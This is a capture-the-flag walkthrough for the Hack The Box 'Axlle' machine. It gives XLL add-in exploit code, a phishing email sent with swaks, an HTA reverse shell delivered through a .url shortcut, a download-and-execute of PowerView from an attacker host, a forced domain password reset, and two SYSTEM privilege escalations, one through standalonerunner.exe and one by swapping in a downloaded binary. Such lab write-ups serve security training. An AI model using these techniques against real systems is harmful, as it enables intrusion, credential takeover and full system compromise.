Hackthebox - Axlle

0x1 Initial Access

  • XLL-EXEC: Excel treats a .xll add-in as a DLL and calls its exported xlAutoOpen when the file is opened, so the attachment runs native code as the user who opens it.
  • Modify the exploit (exploit.c):
#include <windows.h>

/* Excel calls the exported xlAutoOpen as soon as it loads the add-in. */
__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    /* Placeholder: replace with the PowerShell one-liner ("PowerShell #3" on revshells.com).
       Second argument is nCmdShow: 1 = SW_SHOWNORMAL; use 0 (SW_HIDE) to keep the window hidden. */
    WinExec("PowerShell#3 from revshells.com", 1);
}

/* DllMain does nothing; the payload runs from xlAutoOpen, not from the loader notification. */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}
  • Compile the DLL with mingw (a .xll is just a DLL with a different extension):
x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll exploit.c -luser32
  • Send the Exploit via Email
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll

0x2 User Privilege

  • Phishing Email from the Web Dev Team
Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

  • Create shell.hta with a PowerShell reverse shell command embedded. When the shortcut is opened, Windows hands the .hta to mshta.exe, which runs the script as the user who clicked it.
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
        // Placeholder: replace with the PowerShell reverse shell one-liner.
        var c = "Reverse Shell Commands";
        // Run(command, 0 = hidden window, true = wait for the process to exit)
        new ActiveXObject('WScript.Shell').Run(c, 0, true);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
  • Serve the HTA file on an SMB server.
impacket-smbserver -smb2support share .
  • Create a shortcut file (shell.url) pointing to the HTA file on the SMB share:
[InternetShortcut]
URL=file://YOUR_IP/share/shell.hta
  • Drop it into the folder named in the email, e.g. from the current shell:
$url = "file://YOUR_IP/share/shell.hta"
$shortcutPath = "C:\inetpub\testing\shell.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
  • Get shell as dallon.matrix
PS C:\> whoami
axlle\dallon.matrix
  • Get user.txt
  • Use Bloodhound to analyze Active Directory permissions and relationships
  • Bloodhound shows that dallon.matrix (directly or through a group) holds ForceChangePassword over Jacob.Greeny, so that account's password can be reset without knowing the old one. Load PowerView to do it:
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
  • Set New Password for Jacob.Greeny
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
  • Log in as Jacob.Greeny with the new password (e.g. with Evil-WinRM)
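As an added check (example code, not from the original writeup): before resetting the password, confirm with PowerView that the current principal really holds the User-Force-Change-Password extended right over Jacob.Greeny, either directly or through one of its groups, since a stale BloodHound graph can show an edge that no longer exists. It assumes PowerView.ps1 is already loaded as above, that the session runs as dallon.matrix, and the same placeholder password.

```powershell
# Added example, not part of the original writeup. Assumes PowerView is loaded
# and the current session runs as the user that BloodHound showed the edge from.
$target = 'Jacob.Greeny'

# SIDs the current user acts under: its own SID plus every group it belongs to
$me     = Get-DomainUser  -Identity $env:USERNAME
$groups = Get-DomainGroup -MemberIdentity $env:USERNAME
$mySids = @($me.objectsid) + @($groups | ForEach-Object { $_.objectsid })

# ForceChangePassword is the User-Force-Change-Password control access right on the user object
$aces = Get-DomainObjectAcl -Identity $target -ResolveGUIDs |
    Where-Object {
        $_.ActiveDirectoryRights -match 'ExtendedRight' -and
        $_.ObjectAceType -eq 'User-Force-Change-Password' -and
        $mySids -contains $_.SecurityIdentifier.Value
    }

if (-not $aces) {
    Write-Warning "No ForceChangePassword right over $target from this principal; re-check BloodHound"
    return
}
$aces | ForEach-Object {
    '{0} -> {1}: {2}' -f (ConvertFrom-SID $_.SecurityIdentifier), $target, $_.ObjectAceType
}

# Admin-style reset (no old password needed), then prove the new credential works
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity $target -AccountPassword $pass -Verbose
$cred = New-Object System.Management.Automation.PSCredential("axlle\$target", $pass)
Get-DomainUser -Identity $target -Credential $cred -Properties samaccountname, pwdlastset
```

The group lookup matters: on many boxes the ACE is granted to a group the user sits in rather than to the user itself, and filtering only on the user's own SID would report no edge.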

0x3 Shell as Jacob.Greeny

  • README.md Note
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
  • Checking permissions: App Devs have write access (W) to a binary that is executed as SYSTEM, which is the whole privilege escalation
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> icacls standalonerunner.exe
standalonerunner.exe AXLLE\App Devs:(I)(RX,W)
                     Everyone:(I)(R)
                     AXLLE\Administrator:(I)(F)

0x4 Root Access (Intended)

  • Arbitrary Command Execution Via Windows Kit's StandaloneRunner: standalonerunner.exe reads control files from its own directory, and with the right layout it executes the contents of command.txt
  • Create reboot.rsf next to standalonerunner.exe; the first line is the test directory name, the second line is True:
myTestDir
True
  • Mimic the directory structure the runner expects (also next to standalonerunner.exe):
mkdir myTestDir
mkdir myTestDir\working
  • Create an empty rsf.rsf file inside myTestDir\working
  • Create command.txt with the reverse shell command in the same directory as standalonerunner.exe
  • Wait for the automated run of standalonerunner.exe: it reads reboot.rsf, finds myTestDir\working\rsf.rsf and executes the contents of command.txt as SYSTEM
  • Get shell as NT AUTHORITY\SYSTEM, read root.txt
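The whole layout in one script, as an added example that is not from the original writeup. It assumes the runner directory from the README note, that the automated SYSTEM run uses that directory as its working directory (the page's steps rely on the same thing), and a reverse shell one-liner in $payload, which is a placeholder. The point it adds is the file encoding: Out-File in Windows PowerShell 5.1 writes UTF-16LE with a BOM, which a native parser reading reboot.rsf line by line will not understand, so the files are written as plain ASCII.

```powershell
# Added example, not part of the original writeup.
$runnerDir = 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64'
$testDir   = 'myTestDir'
$payload   = 'powershell -e <BASE64_REVERSE_SHELL>'   # placeholder, e.g. PowerShell #3 from revshells.com

# Plain ASCII, no BOM, CRLF line endings: Set-Content/Out-File defaults vary by PowerShell version.
function Write-Ascii([string]$Path, [string]$Text) {
    [IO.File]::WriteAllText($Path, $Text, [Text.Encoding]::ASCII)
}

# Sanity check first: nothing below works unless this principal can write here (App Devs can)
icacls "$runnerDir\standalonerunner.exe"

# reboot.rsf: first line test directory name, second line True
Write-Ascii "$runnerDir\reboot.rsf" "$testDir`r`nTrue`r`n"

# Directory structure the runner looks for, plus the empty marker file
New-Item -ItemType Directory -Force -Path "$runnerDir\$testDir\working" | Out-Null
Write-Ascii "$runnerDir\$testDir\working\rsf.rsf" ''

# The command the SYSTEM run will execute
Write-Ascii "$runnerDir\command.txt" "$payload`r`n"

# Show what was laid out; then start the listener and wait for the next automated run
Get-ChildItem -Recurse $runnerDir | Select-Object FullName, Length
Get-Content "$runnerDir\reboot.rsf"
```

Keep the listener up; the shell arrives when the scheduled run next picks up command.txt, not immediately.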

0x5 Unintended Root

  • Replace standalonerunner.exe with a malicious .exe (App Devs have write access to it) so the next automated run executes it as SYSTEM. In Evil-WinRM, wget is the Invoke-WebRequest alias and -o resolves to -OutFile:
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> wget http://YOUR_IP/standalonerunner.exe -o standalonerunner.exe
  • Catch the Metasploit session as NT AUTHORITY\SYSTEM (the account the README note says runs the binary)
  • Read root.txt